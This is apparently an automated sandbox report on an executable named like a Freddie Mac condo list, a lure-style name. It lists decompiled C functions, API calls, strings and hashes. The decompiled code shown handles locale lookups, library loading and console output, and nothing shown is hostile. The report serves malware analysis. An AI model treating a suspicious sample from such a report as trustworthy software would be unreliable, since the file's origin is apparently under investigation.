GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4

Strings

kernel32.dll, xrefs: 0040A285, 0040A29F, 0040A2B9
GetThreadUILanguage, xrefs: 0040A2B4
SetThreadPreferredUILanguages, xrefs: 0040A29A
GetThreadPreferredUILanguages, xrefs: 0040A280

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
API String ID: 74573329-1403180336
Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216
threadCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}

0x0041e0ac
0x0041e0ac
0x0041e0ad
0x0041e0af
0x0041e0b4
0x0041e0b4
0x0041e0b6
0x0041e0b8
0x0041e0b8
0x0041e0bd
0x0041e0be
0x0041e0c0
0x0041e0c4
0x0041e0c5
0x0041e0ca
0x0041e0cd
0x0041e0d3
0x0041e0d8
0x0041e0da
0x0041e0e1
0x0041e0e1
0x0041e0e9
0x0041e0ef
0x0041e0f8
0x0041e101
0x0041e10a
0x0041e11c
0x0041e126
0x0041e13b
0x0041e14a
0x0041e15d
0x0041e16c
0x0041e182
0x0041e199
0x0041e1b0
0x0041e1bf
0x0041e1d2
0x0041e1d4
0x0041e1d8
0x0041e1e9
0x0041e1f4
0x0041e1fd
0x0041e20e
0x0041e219
0x0041e22e
0x0041e242
0x0041e24d
0x0041e262
0x0041e26d
0x0041e275
0x0041e27d
0x0041e292
0x0041e29c
0x0041e2a1
0x0041e2a3
0x0041e2bc
0x0041e2a5
0x0041e2ad
0x0041e2ad
0x0041e2d1
0x0041e2db
0x0041e2e0
0x0041e2e2
0x0041e2f4
0x0041e305
0x0041e31e
0x0041e307
0x0041e30f
0x0041e30f
0x0041e305
0x0041e323
0x0041e326
0x0041e329
0x0041e32e
0x0041e339
0x0041e33e
0x0041e341
0x0041e344
0x0041e349
0x0041e354
0x0041e369
0x0041e36d
0x0041e378
0x0041e37b
0x0041e37e
0x0041e390

APIs

IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC

Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093

Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052

Strings

:mm, xrefs: 0041E329
ToA, xrefs: 0041E0E9
mmmm d, yyyy, xrefs: 0041E202
AMPM , xrefs: 0041E319
AMPM, xrefs: 0041E30A
m/d/yy, xrefs: 0041E1DD
:mm:ss, xrefs: 0041E344
2, xrefs: 0041E36D

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Locale$Info$ThreadValid
String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
API String ID: 233154393-2808312488
Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}

0x0040a7e4
0x0040a7e7
0x0040a7e9
0x0040a7ea
0x0040a7eb
0x0040a7ed
0x0040a7f1
0x0040a7f2
0x0040a7f7
0x0040a7fa
0x0040a802
0x0040a80e
0x0040a835
0x0040a83c
0x0040a84e
0x0040a857
0x0040a868
0x0040a86d
0x0040a875
0x0040a87a
0x0040a883
0x0040a883
0x0040a888
0x0040a890
0x0040a89a
0x0040a89a
0x0040a859
0x0040a85d
0x0040a85d
0x0040a857
0x0040a8a4
0x0040a8a9
0x0040a8c3
0x0040a8cd
0x0040a810
0x0040a81c
0x0040a826
0x0040a826
0x0040a8d4
0x0040a8d7
0x0040a8da
0x0040a8e7

APIs

EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD

Strings

en-US,en,, xrefs: 0040A812, 0040A8B9

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-US,en,
API String ID: 975949045-3579323720
Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F

Uniqueness

Uniqueness Score: -1.00%

Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82
registryCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}

0x00423022
0x00423025
0x00423028
0x0042302d
0x0042302e
0x00423033
0x00423036
0x00423049
0x00423050
0x00423063
0x004230b8
0x004230c5
0x004230ce
0x004230ce
0x00423065
0x00423080
0x0042308d
0x00423096
0x00423096
0x00423080
0x004230de
0x004230e9
0x004230f4
0x004230f4
0x00423052
0x00423052
0x00423054
0x004230fa
0x004230fd
0x00423100
0x00423108
0x00423115

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096

Strings

.DEFAULT\Control Panel\International, xrefs: 0042306D
kernel32.dll, xrefs: 0042303E
Locale, xrefs: 00423085
Control Panel\Desktop\ResourceLocale, xrefs: 004230A5
GetUserDefaultUILanguage, xrefs: 00423039

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}

0x0040d22c
0x0040d232
0x0040d234
0x0040d237
0x0040d244
0x0040d251
0x0040d25e
0x0040d26b
0x0040d278
0x0040d285
0x0040d28e
0x0040d29c
0x0040d29e
0x0040d29f
0x0040d2a5
0x0040d2ab
0x0040d2b2
0x0040d2b4
0x0040d2ba
0x0040d2c0
0x0040d2d0
0x00000000
0x0040d2d5
0x0040d2e2
0x0040d2e7
0x0040d2e9
0x0040d2eb
0x0040d2eb
0x0040d2f1
0x0040d2f4
0x0040d2fc
0x0040d306
0x0040d309
0x0040d30e
0x0040d329
0x0040d310
0x0040d31c
0x0040d31c
0x0040d32c
0x0040d335
0x0040d34e
0x0040d350
0x0040d412
0x0040d412
0x0040d41c
0x0040d42a
0x0040d42a
0x0040d42e
0x0040d47b
0x0040d47d
0x0040d484
0x0040d48e
0x0040d49c
0x0040d49c
0x0040d4a0
0x0040d4a2
0x0040d4a7
0x0040d4ad
0x0040d4bd
0x0040d4c2
0x0040d4c2
0x0040d4a0
0x00000000
0x0040d430
0x0040d434
0x0040d46f
0x0040d479
0x00000000
0x0040d43c
0x0040d43f
0x0040d447
0x00000000
0x0040d460
0x0040d466
0x0040d46b
0x00000000
0x00000000
0x0040d4c5
0x0040d4c8
0x00000000
0x0040d4c8
0x0040d447
0x0040d434
0x0040d42e
0x0040d35d
0x0040d36b
0x0040d36b
0x0040d36f
0x0040d37a
0x0040d37a
0x0040d37e
0x0040d3cb
0x0040d3d7
0x0040d40d
0x0040d3d9
0x0040d3dd
0x0040d3e3
0x0040d3e8
0x0040d3ed
0x0040d3f4
0x0040d3fa
0x0040d3ff
0x0040d404
0x0040d404
0x0040d3ed
0x0040d3dd
0x00000000
0x0040d380
0x0040d385
0x0040d38f
0x0040d39d
0x0040d39d
0x0040d3a1
0x00000000
0x0040d3a3
0x0040d3a3
0x0040d3a8
0x0040d3ae
0x0040d3be
0x00000000
0x0040d3c3
0x0040d3a1
0x0040d337
0x0040d343
0x0040d347
0x00000000
0x0040d349
0x0040d4ca
0x0040d4d1
0x0040d4d5
0x0040d4d8
0x0040d4db
0x0040d4e4
0x0040d4e4
0x00000000
0x0040d4ea
0x0040d347

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}

0x004047b0
0x004047b3
0x004047b5
0x004047be
0x00404821
0x00404826
0x00404827
0x00404828
0x0040482a
0x004047c0
0x004047c9
0x004047d8
0x004047e4
0x004047e9
0x004047ef
0x004047fd
0x0040480b
0x0040481a
0x0040481a
0x00404832

APIs

GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A

Strings

9@, xrefs: 004047E4, 004047EF

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandleWrite
String ID: 9@
API String ID: 3320372497-3209974744
Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
